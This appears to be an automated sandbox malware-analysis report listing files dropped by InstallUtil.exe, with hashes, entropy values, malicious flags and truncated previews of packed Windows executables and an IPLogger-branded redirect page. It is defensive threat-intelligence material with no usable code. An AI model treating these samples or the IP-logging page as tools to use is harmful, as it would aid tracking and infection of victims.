                                                                                                                                                                                                                                MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7446
                                                                                                                                                                                                                                Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2960760
                                                                                                                                                                                                                                Entropy (8bit):7.768478150231569
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:enSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXH8:tWqlkLESgCRE/vhOjb05efd6e/oXH8
                                                                                                                                                                                                                                MD5:B8ACE348FC73163DC5C13EFA0E554A89
                                                                                                                                                                                                                                SHA1:3BCC053EED10399CEC9B9B57651BB8E10C7F8EB7
                                                                                                                                                                                                                                SHA-256:D415E52DE093B9E9487FCC3244F190AFEFF659473172E3292C14A8E95F2FA101
SHA-512:B42085040F6C61E56EF8C297563104C60A222064B830CB086AC5C7AFB8FE25A4D6E27EB3E8DC58F398B9725087B30233CD0717DA06FF0BC20F16FCB2B657CDE4
Malicious:true
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S......-...@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
Category:dropped
Size (bytes):2146073
Entropy (8bit):7.982154114080947
Encrypted:false
SSDEEP:49152:LicR35VLbGdkj8PvKuSa5KeSQqJQ75Knd5KfK1j6DmgtP:uE3Ljj8HKQ3ASQd5Ky9ctP
MD5:4D3AD654117203E9216F6F44480BB6E0
SHA1:8550BF29BBA0A0249630DC6BF3C1BE89745918A6
SHA-256:965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
SHA-512:7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2172545
Entropy (8bit):7.994835824960051
Encrypted:true
SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
MD5:9D959BCB3482D418504AF43B76F7A181
SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
Malicious:true
Reputation:unknown
Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:dropped
Size (bytes):7446
Entropy (8bit):5.422209848736349
Encrypted:false
SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:5B423612B36CDE7F2745455C5DD82577
SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:false
Reputation:unknown
Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
Category:dropped
Size (bytes):2146073
Entropy (8bit):7.982154114080947
Encrypted:false
SSDEEP:49152:LicR35VLbGdkj8PvKuSa5KeSQqJQ75Knd5KfK1j6DmgtP:uE3Ljj8HKQ3ASQd5Ky9ctP
MD5:4D3AD654117203E9216F6F44480BB6E0
SHA1:8550BF29BBA0A0249630DC6BF3C1BE89745918A6
SHA-256:965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
SHA-512:7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
Category:dropped
Size (bytes):2146073
Entropy (8bit):7.982154114080947
Encrypted:false
SSDEEP:49152:LicR35VLbGdkj8PvKuSa5KeSQqJQ75Knd5KfK1j6DmgtP:uE3Ljj8HKQ3ASQd5Ky9ctP
MD5:4D3AD654117203E9216F6F44480BB6E0
SHA1:8550BF29BBA0A0249630DC6BF3C1BE89745918A6
SHA-256:965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
SHA-512:7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:dropped
Size (bytes):2960760
Entropy (8bit):7.768474108976907
Encrypted:false
SSDEEP:49152:GnSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHr:VWqlkLESgCRE/vhOjb05efd6e/oXHr
MD5:C070D0E52433F284E0F3C6C5CCB957FA
SHA1:44FAE2AFC77F2DE20CB7CA671FC68B3A4D4C58EC
SHA-256:AC759E9BD6BDD4BD7BC7DBA5F7E1666A20C009C003B5560ED91ADCCA12279CB2
SHA-512:9CF5BD11E7A57AFC44580BBE4A92E2AC9338CAAF7EE10E1486700DFEFA151CA8112B705B475B8CBEEB33A4136F3BEF5C599F8C3661B810DD73BFF09FF7588150
Malicious:true
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S...... ....@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:dropped
Size (bytes):2960760
Entropy (8bit):7.7684773333644035
Encrypted:false
SSDEEP:49152:jnSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXH+:OWqlkLESgCRE/vhOjb05efd6e/oXH+
MD5:60E7CBE62953DCC0C073B17903CDD964
SHA1:2D3EB136171651062FE0C518354DA606DB3B81A4
SHA-256:DD60C708010E249DF01825AEAEB2EE20E8E61696538DEAA9F71DE2E82DFF48F0
SHA-512:979A635C9E56909FB504AE2AA3775EFE096DC505EECD1579D4F5EE3AE13DBA7BA9291DDB2A8DACA8589ED8E81D2BB6A81525B4B7743FF89184C43ADCD903CDEE
Malicious:true
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S......-...@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2960760
                                                                                                                                                                                                                                Entropy (8bit):7.768477901904957
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:onSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHb:LWqlkLESgCRE/vhOjb05efd6e/oXHb
                                                                                                                                                                                                                                MD5:61ACBBC8CAEF6EB5C8D4CBDE2EEC2312
                                                                                                                                                                                                                                SHA1:CB9220CBC288E6AE86FC37F95F40A08618F24F83
                                                                                                                                                                                                                                SHA-256:5077CF4228786A5C7FDF27D9CB46977F6083663D20AD852C8BCA367C6A73E6BC
                                                                                                                                                                                                                                SHA-512:49970239E8820186EA218FF5B9D61300BE7D7C9C5077DA8E62A8C54A220BCBB51F9EA630321F9D3F97C5E60860878DC2C7B1370E6EB45061C61B420AC5EEC666
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S.......-...@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7446
                                                                                                                                                                                                                                Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2146073
                                                                                                                                                                                                                                Entropy (8bit):7.982154114080947
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:LicR35VLbGdkj8PvKuSa5KeSQqJQ75Knd5KfK1j6DmgtP:uE3Ljj8HKQ3ASQd5Ky9ctP
                                                                                                                                                                                                                                MD5:4D3AD654117203E9216F6F44480BB6E0
                                                                                                                                                                                                                                SHA1:8550BF29BBA0A0249630DC6BF3C1BE89745918A6
                                                                                                                                                                                                                                SHA-256:965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
                                                                                                                                                                                                                                SHA-512:7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2960760
                                                                                                                                                                                                                                Entropy (8bit):7.768478707012743
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:NnSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHE:kWqlkLESgCRE/vhOjb05efd6e/oXHE
                                                                                                                                                                                                                                MD5:2B8B2102FC536A6830F9F1B6B1FBAF10
                                                                                                                                                                                                                                SHA1:6D0B2894A9522B1F49F2E0621559562DCE49068F
                                                                                                                                                                                                                                SHA-256:7BFC33C312DA336891DB06D105C1287053BD71BC2D5079F1B78FC4E5130FC71D
                                                                                                                                                                                                                                SHA-512:046672DDBAEC7A38FB5361CE327DC32BF39E79A12C29A53086CA37558405C155BB34A3D2E5260A89BB41F0CF0F63A190126AF76B17E673100E0BBB742D5DBB5C
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S.......-...@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2146073
                                                                                                                                                                                                                                Entropy (8bit):7.982154114080947
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:LicR35VLbGdkj8PvKuSa5KeSQqJQ75Knd5KfK1j6DmgtP:uE3Ljj8HKQ3ASQd5Ky9ctP
                                                                                                                                                                                                                                MD5:4D3AD654117203E9216F6F44480BB6E0
                                                                                                                                                                                                                                SHA1:8550BF29BBA0A0249630DC6BF3C1BE89745918A6
                                                                                                                                                                                                                                SHA-256:965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
                                                                                                                                                                                                                                SHA-512:7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2172545
                                                                                                                                                                                                                                Entropy (8bit):7.994835824960051
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
                                                                                                                                                                                                                                MD5:9D959BCB3482D418504AF43B76F7A181
                                                                                                                                                                                                                                SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
                                                                                                                                                                                                                                SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
                                                                                                                                                                                                                                SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):4283784
Entropy (8bit):7.981853182461957
Encrypted:false
SSDEEP:98304:49XSCNlPy0+oWTC7ifvPzHoWNjguEdqMB7o:41SCP6Z3zI4aqMW
MD5:F0A6999F1BC47C6C468CF6DB95003AD5
SHA1:34E2A0E4206D92DA8F328BC87850F6916FDCF1A2
SHA-256:26DB2D4F2338C7301E8B4F1C9C96BBD221DC3C2FF88B1B9B4E253765B8294FDD
SHA-512:26F5978D349704F4A0D32CB5755002721FECF1817393364DD1256F44EC7DFF8EAC6DA68601C209F81837F8A352C846DF0C773E67FA19265843E49B80A691AAA8
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u'.|.t.|.t.|.t...t.|.t...t.|.t...t.|.t...t.|.t.|.t.|.t...t.|.t...t.|.t...t.|.tRich.|.t................PE..L....J.d.....................ZE.....}.............@.................................v.B......................................@.(....pE..x...........RA.................................................................L............................text............................... ..`.rdata....@.......@.................@..@.data...@.....@..(....@.............@....rsrc....HL..pE..z....@.............@..@........................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:dropped
Size (bytes):7446
Entropy (8bit):5.422209848736349
Encrypted:false
SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:5B423612B36CDE7F2745455C5DD82577
SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:false
Reputation:unknown
Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
Category:dropped
Size (bytes):2146073
Entropy (8bit):7.982154114080947
Encrypted:false
SSDEEP:49152:LicR35VLbGdkj8PvKuSa5KeSQqJQ75Knd5KfK1j6DmgtP:uE3Ljj8HKQ3ASQd5Ky9ctP
